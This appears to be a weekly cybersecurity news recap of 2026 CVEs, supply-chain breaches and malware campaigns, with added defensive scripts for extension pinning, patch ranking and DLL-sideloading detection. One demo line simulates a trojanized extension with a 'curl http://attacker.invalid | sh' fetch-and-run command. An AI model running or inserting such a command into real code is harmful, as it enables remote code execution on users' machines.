⚡ Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos


From long-ignored Linux vulnerabilities to AI-driven phishing campaigns and supply chain compromises, this week’s cybersecurity landscape highlights one clear trend: attackers are moving faster than defenders can patch.

This week in cybersecurity saw a sharp rise in real-world exploitation of known vulnerabilities, continued abuse of developer tools in supply chain attacks, and increasingly sophisticated phishing operations that bypass traditional security controls.


⚡ Threat of the Week: GitHub Breach Linked to Compromised VS Code Extension

GitHub confirmed a major security incident involving the compromise of an employee device through a trojanized version of the Nx Console Visual Studio Code extension.

The attack, attributed to a cybercriminal group tracked as TeamPCP, led to the theft of approximately 3,800 internal repositories.

Investigators linked the incident to a broader supply chain campaign involving the TanStack ecosystem compromise, which also impacted organizations such as OpenAI, Mistral AI, and Grafana Labs.

Security researchers warn that publicly released tooling associated with the campaign has lowered the barrier for similar attacks, increasing the long-term risk to developer environments and open-source ecosystems.
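A pinning check for the local VS Code extension directory, added here as an example; it is not GitHub's, Nx's or TeamPCP's tooling. It assumes the default layout ~/.vscode/extensions/<publisher>.<name>-<version>/ with a package.json in each directory, and an allowlist your team maintains of reviewed extension versions and directory hashes. The extensions built in demo() are constructed (hypothetical publishers acme and evil, hypothetical host attacker.invalid) so it runs offline; a trojanized build that keeps the same version string still shows up, because the whole directory is hashed.

```python
"""Pin the installed VS Code extensions and flag anything unknown or tampered.

Added example for this recap; it is not GitHub's, Nx's or the attacker's tooling.
Assumes the default layout ~/.vscode/extensions/<publisher>.<name>-<version>/
with a package.json in each directory, and an allowlist your team keeps of
reviewed extension versions and directory hashes.
"""
import hashlib
import json
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

Allowlist = Dict[str, Tuple[str, str]]  # "publisher.name" -> (version, sha256 of directory)


def hash_extension_dir(ext_dir: Path) -> str:
    """SHA-256 over every file's relative path and bytes, in sorted order, so the
    result is deterministic and any added, removed or edited file changes it."""
    h = hashlib.sha256()
    for path in sorted(p for p in ext_dir.rglob("*") if p.is_file()):
        h.update(str(path.relative_to(ext_dir)).encode())
        h.update(b"\0")
        h.update(path.read_bytes())
        h.update(b"\0")
    return h.hexdigest()


def inventory(extensions_root: Path) -> Allowlist:
    """Read each extension's package.json and return id -> (version, hash)."""
    found: Allowlist = {}
    for ext_dir in sorted(p for p in extensions_root.iterdir() if p.is_dir()):
        manifest = ext_dir / "package.json"
        if not manifest.is_file():
            continue
        meta = json.loads(manifest.read_text(encoding="utf-8"))
        ext_id = f"{meta['publisher']}.{meta['name']}".lower()
        found[ext_id] = (str(meta.get("version", "?")), hash_extension_dir(ext_dir))
    return found


def verify(extensions_root: Path, allowlist: Allowlist) -> List[str]:
    """One line per problem; an empty list means every extension is pinned and intact."""
    findings = []
    for ext_id, (version, digest) in inventory(extensions_root).items():
        if ext_id not in allowlist:
            findings.append(f"UNKNOWN  {ext_id}@{version} was never reviewed")
            continue
        want_version, want_digest = allowlist[ext_id]
        if version != want_version:
            findings.append(f"VERSION  {ext_id} is {version}, pinned {want_version}")
        elif digest != want_digest:
            findings.append(f"MODIFIED {ext_id}@{version} differs from the reviewed build")
    return findings


def demo() -> List[str]:
    """Constructed sample (hypothetical publishers): one intact, one tampered, one unknown."""
    root = Path(tempfile.mkdtemp(prefix="vscode-ext-"))

    def make_ext(publisher: str, name: str, version: str) -> Path:
        d = root / f"{publisher}.{name}-{version}"
        d.mkdir()
        (d / "package.json").write_text(json.dumps(
            {"publisher": publisher, "name": name, "version": version}))
        (d / "extension.js").write_text("exports.activate = () => {};\n")
        return d

    allowlist: Allowlist = {}
    for name in ("formatter", "linter"):
        d = make_ext("acme", name, "1.0.0")
        allowlist[f"acme.{name}"] = ("1.0.0", hash_extension_dir(d))
    # Simulate a trojanized update that keeps the version string but swaps in a payload.
    (root / "acme.linter-1.0.0" / "extension.js").write_text(
        "require('child_process').exec('curl http://attacker.invalid | sh');\n")
    make_ext("evil", "nx-helper", "0.0.1")  # installed without review
    return verify(root, allowlist)


if __name__ == "__main__":
    for line in demo() or ["OK: all extensions pinned and intact"]:
        print(line)
```

Run it against the real directory by calling verify(Path.home() / ".vscode" / "extensions", allowlist) with the allowlist regenerated from inventory() after each review; a version bump that nobody approved is the signal to look at before the next sync.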


🔔 Top Security Headlines

Microsoft Disrupts Fox Tempest Malware Infrastructure

Microsoft has taken action against the threat group Fox Tempest, an upstream enabler in multiple ransomware and malware operations including Rhysida, Oyster, Lumma Stealer, and Vidar.

The group was known for selling fraudulent code-signing services, so that malware shipped with trusted signatures and slipped past controls that treat signed binaries as safe.


Nine-Year-Old Linux Kernel Bug Enables Root Execution

A newly tracked vulnerability, CVE-2026-46333, has been found in the Linux kernel, silently present since 2016.

The flaw stems from improper privilege handling and can allow local attackers to escalate privileges, access sensitive files, and execute commands as root on widely used distributions including Debian, Fedora, and Ubuntu.


Active Exploitation of Microsoft Defender Zero-Days

Microsoft confirmed active exploitation of two vulnerabilities affecting Microsoft Defender:

  • CVE-2026-41091 (privilege escalation to SYSTEM level)
  • CVE-2026-45498 (denial-of-service condition)

While official attribution is still unclear, the flaws closely match the previously disclosed “RedSun” and “UnDefend” zero-days, suggesting the same bugs are now being exploited in the wild.


Drupal Core Vulnerability Under Mass Attack

A critical SQL injection vulnerability in Drupal Core (CVE-2026-9082) is being actively exploited shortly after public disclosure.

Security firm Imperva reported over 15,000 attack attempts targeting nearly 6,000 websites across 65 countries, highlighting how quickly attackers weaponize newly disclosed flaws.


AI Security Tools Discover Thousands of Vulnerabilities

Anthropic’s Project Glasswing has reportedly identified more than 10,000 potential high- and critical-severity vulnerabilities across widely used open-source software.

Of these, over 1,000 have already been confirmed as valid security issues, with dozens patched upstream and additional advisories issued.


Cisco Issues Patch for Critical Secure Workload Flaw

Cisco has released fixes for CVE-2026-20223, a maximum-severity vulnerability in Secure Workload that could allow unauthenticated attackers to access sensitive data and modify configurations across tenant environments via API abuse.


Microsoft Mitigates YellowKey BitLocker Bypass

Microsoft has issued mitigations for CVE-2026-45585, a BitLocker bypass vulnerability affecting multiple Windows and Windows Server versions.

The flaw requires physical access to the device and could allow an attacker to bypass device encryption protections and read data from a BitLocker-protected drive.


🔥 Trending CVEs This Week

A large number of high-risk vulnerabilities are currently being actively monitored or exploited, including:

  • CVE-2026-46333 (Linux Kernel privilege escalation)
  • CVE-2026-9082 (Drupal Core SQL injection)
  • CVE-2026-20223 (Cisco Secure Workload API flaw)
  • CVE-2026-41091 / CVE-2026-45498 (Microsoft Defender issues)
  • CVE-2026-45585 (Windows BitLocker bypass)
  • Multiple vulnerabilities across Chrome, PostgreSQL, Splunk, MongoDB, Apache OFBiz, and UniFi OS

Security teams are urged to prioritize patching widely exposed systems first, especially internet-facing services.
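One way to turn the advice above into a repeatable patch ordering, added as an example rather than any vendor's scoring model. The weights, tier thresholds and asset names are the editor's assumptions; severity labels marked "assumed" in the code are placeholders where the page gives none, while the exploited and internet-facing flags follow what the page reports for each CVE.

```python
"""Rank this week's CVEs for patching by exploitation, exposure and asset value.

Added example for this recap, not a vendor scoring model. Severity labels marked
'assumed' are the editor's placeholders where the page gives none; exploited and
internet-facing flags follow what the page reports. Asset names are constructed.
"""
from dataclasses import dataclass
from typing import List, Tuple

SEVERITY_WEIGHT = {"critical": 10, "high": 8, "medium": 5, "low": 2}
EXPLOITED_MULT = 4      # confirmed in-the-wild exploitation outranks raw severity
INTERNET_MULT = 2       # reachable from the internet without prior access
CROWN_JEWEL_MULT = 1.5  # asset holds sensitive data or controls other systems


@dataclass(frozen=True)
class Finding:
    cve: str
    asset: str
    severity: str
    exploited: bool
    internet_facing: bool
    crown_jewel: bool = False


def score(f: Finding) -> float:
    s = float(SEVERITY_WEIGHT[f.severity])
    if f.exploited:
        s *= EXPLOITED_MULT
    if f.internet_facing:
        s *= INTERNET_MULT
    if f.crown_jewel:
        s *= CROWN_JEWEL_MULT
    return s


def tier(s: float) -> str:
    if s >= 60:
        return "P0: patch or isolate within 24h"
    if s >= 20:
        return "P1: patch within 7 days"
    return "P2: next maintenance window"


def prioritize(findings: List[Finding]) -> List[Tuple[float, str, Finding]]:
    """Highest score first; ties broken by CVE ID so the report is stable run to run."""
    ranked = []
    for f in findings:
        s = score(f)
        ranked.append((s, tier(s), f))
    return sorted(ranked, key=lambda t: (-t[0], t[2].cve))


# Constructed inventory built from the CVEs in this recap.
SAMPLE_FINDINGS = [
    Finding("CVE-2026-9082", "public Drupal site", "critical",
            exploited=True, internet_facing=True, crown_jewel=True),
    Finding("CVE-2026-20223", "Secure Workload tenant API", "critical",   # exposure assumed
            exploited=False, internet_facing=True, crown_jewel=True),
    Finding("CVE-2026-41091", "employee laptops (Defender)", "high",       # severity assumed
            exploited=True, internet_facing=False),
    Finding("CVE-2026-45498", "employee laptops (Defender)", "medium",     # severity assumed
            exploited=True, internet_facing=False),
    Finding("CVE-2026-46333", "Ubuntu build servers", "high",              # severity assumed
            exploited=False, internet_facing=False, crown_jewel=True),
    Finding("CVE-2026-45585", "BitLocker laptops (physical access)", "medium",  # severity assumed
            exploited=False, internet_facing=False),
    Finding("CVE-2018-5999", "branch-office ASUS routers", "critical",
            exploited=True, internet_facing=True),
]

if __name__ == "__main__":
    for s, t, f in prioritize(SAMPLE_FINDINGS):
        print(f"{s:6.1f}  {t:34}  {f.cve:15}  {f.asset}")
```

With these weights the two exploited, internet-facing bugs (Drupal and the ASUS routers) land in P0, the exploited Defender escalation sits just above the unexploited maximum-severity Cisco flaw in P1, and the local-only kernel and BitLocker issues fall to the normal cycle. Tune the multipliers to your environment, but keep confirmed exploitation as the dominant factor.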


🌍 Around the Cyber Threat Landscape

Vulnerability Exploitation Surpasses Credential Theft

According to Verizon’s latest findings, vulnerability exploitation has overtaken stolen credentials as the leading initial access method in cyberattacks for the first time in nearly 20 years.

Nearly 31% of breaches now begin with exploited software flaws, signaling a major shift in attacker behavior.


Education Sector Targeted in Phishing Campaigns

Threat actors are increasingly targeting India’s education ecosystem using fake admission, scholarship, and fee payment lures.

Attackers exploit student data and institutional branding to build convincing phishing portals designed to steal credentials and financial information.


Botnets Exploit ASUS Router Vulnerability

The RondoDox botnet has added CVE-2018-5999, a critical ASUS router vulnerability, to its exploitation toolkit.

Researchers observed active exploitation against honeypots, with attackers attempting to enable hidden services for configuration hijacking.


Fake Microsoft Teams Sites Deliver ValleyRAT

Cybercriminals are distributing trojanized Microsoft Teams installers via phishing campaigns, leading to the deployment of ValleyRAT malware.

The attack chain sideloads a malicious DLL through legitimate Tencent binaries, so the payload runs inside a trusted process and evades detection.
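A detection sketch for the sideloading technique described above, added as an example and not taken from any vendor's ruleset. It assumes Sysmon Event ID 7 (ImageLoad) fields Image, ImageLoaded and Signed, plus a HostSigned flag that is an assumed enrichment joined from the loading process's process-creation event. The four records are constructed: the Teams-themed paths are hypothetical and the Tencent binaries used in the real campaign are not reproduced.

```python
"""Flag DLL sideloading candidates in Sysmon ImageLoad (Event ID 7) records.

Added example for this recap; not vendor detection content. Fields Image,
ImageLoaded and Signed are Sysmon's; HostSigned is an ASSUMED enrichment
(signature status of the loading process, joined from its process-create event).
Heuristics:
  1. a signed host process loads an unsigned DLL from its own directory, and
     that directory is outside the Windows / Program Files trees;
  2. a DLL carrying a Windows system library name is loaded from outside
     System32 / SysWOW64 (search-order hijack of a trusted binary).
"""
import ntpath
from typing import Dict, List, Tuple

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Illustrative subset of system DLL names commonly abused for sideloading.
SIDELOAD_NAMES = {"version.dll", "dbghelp.dll", "wininet.dll", "userenv.dll",
                  "profapi.dll", "cryptbase.dll", "msimg32.dll", "dwmapi.dll"}

Event = Dict[str, str]


def _dir(path: str) -> str:
    return ntpath.dirname(path).lower().rstrip("\\")


def _under(path: str, roots: Tuple[str, ...]) -> bool:
    p = path.lower()
    return any(p.startswith(r) for r in roots)


def classify(ev: Event) -> List[str]:
    """Reasons this load looks like sideloading; an empty list means no heuristic fired."""
    host, dll = ev["Image"], ev["ImageLoaded"]
    dll_name = ntpath.basename(dll).lower()
    dll_signed = ev.get("Signed", "false").lower() == "true"
    host_signed = ev.get("HostSigned", "false").lower() == "true"
    reasons = []
    if host_signed and not dll_signed and _dir(host) == _dir(dll) and not _under(dll, TRUSTED_ROOTS):
        reasons.append("signed host loaded an unsigned DLL from its own non-system directory")
    if dll_name in SIDELOAD_NAMES and not _under(dll, SYSTEM_DIRS):
        reasons.append(f"system DLL name {dll_name} loaded from outside System32/SysWOW64")
    return reasons


def scan(events: List[Event]) -> List[Tuple[Event, List[str]]]:
    """Return (event, reasons) for each event that fired at least one heuristic."""
    hits = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            hits.append((ev, reasons))
    return hits


# Constructed records; the Teams-themed paths are hypothetical.
SAMPLE_EVENTS: List[Event] = [
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true", "HostSigned": "true"},
    {"Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\helper.dll", "Signed": "true", "HostSigned": "true"},
    # Fake installer in Downloads: signed EXE loads an unsigned version.dll sitting next to it.
    {"Image": r"C:\Users\alice\Downloads\TeamsSetup\Teams.exe",
     "ImageLoaded": r"C:\Users\alice\Downloads\TeamsSetup\version.dll", "Signed": "false", "HostSigned": "true"},
    # Signed third-party launcher in %TEMP% pulls dbghelp.dll from its own folder instead of System32.
    {"Image": r"C:\Users\alice\AppData\Local\Temp\upd\Launcher.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\upd\dbghelp.dll", "Signed": "true", "HostSigned": "true"},
]

if __name__ == "__main__":
    for ev, reasons in scan(SAMPLE_EVENTS):
        print(ev["Image"], "->", ev["ImageLoaded"])
        for r in reasons:
            print("   ", r)
```

The second heuristic catches the case where the attacker signs the dropped DLL (or the loader reports an unknown signature as valid): a file named like a system library but living in a user-writable folder next to a signed executable is the shape of almost every sideload, whatever its signature status. Expect some noise from portable applications that ship their own copies of these DLLs; allowlist those by path rather than weakening the rule.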


Android NFC Malware Expands in Europe and LATAM

Two new Android malware families, DevilNFC and NFCMultiPay, are targeting banking users through NFC relay attacks.

The malware captures card PINs and enables unauthorized transactions, using relay techniques and kiosk-mode locking to trap victims during the attack.


Ethereum-Based Botnet C2 Emerges

A new malware family called Void Botnet uses Ethereum smart contracts as a command-and-control channel, making takedown efforts significantly harder.

The botnet allows operators to switch between blockchain-based and traditional web-based control mechanisms.


🧰 Security Tools of the Week

  • Bumblebee – A lightweight macOS and Linux tool that scans developer environments for supply chain vulnerabilities without executing code.
  • Claude-BugHunter – An AI-assisted security add-on that helps automate vulnerability discovery and reporting using structured attack patterns.

🧠 Final Takeaway

This week reinforces a clear pattern: attackers are not waiting for organizations to catch up.

Old vulnerabilities are being rediscovered and weaponized, developer tools are being used as attack vectors, and phishing is evolving into fully automated, AI-assisted operations.

The gap between disclosure and exploitation continues to shrink—and in many cases, it has already disappeared.


Copyright © 2023 Cyber Reports Cyber Security News All Rights Reserved